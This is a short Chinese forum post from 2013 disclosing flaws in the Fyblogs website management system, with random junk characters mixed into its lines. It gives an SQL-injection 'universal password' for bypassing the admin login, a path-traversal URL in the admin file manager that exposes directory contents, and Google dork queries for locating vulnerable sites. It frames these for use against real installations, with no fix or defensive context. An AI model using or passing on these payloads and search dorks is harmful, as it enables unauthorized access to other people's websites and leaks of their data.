找回密码
 立即注册
查看: 2719|回复: 0
打印 上一主题 下一主题

Fyblogs网站管理系统漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:17:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
后台万能密码 'or'='or'
7 K2 ], g+ ~0 q* I0 m) Y4 |) A" ?- t5 n- c# Y1 h
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
: u/ S/ j$ o8 |# Z  k& tadmin/uploadfile.asp?currentFolder=/upfiles/../" e: ?# H3 m; `/ p; H' v7 r, [

9 z& f& m/ v6 P漏洞证明:
: `  D; b6 W; N+ i/ I# b7 ^1 V- ]/ u3 O0 [* r* C% R
谷歌:inurl:type.asp?id=1 新闻中心. g, q% c; i. T  j
或者 :inurl:download_ok.asp?
& z3 L0 g( p  @7 v, d8 z3 P9 t7 T1 Y/ C1 b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表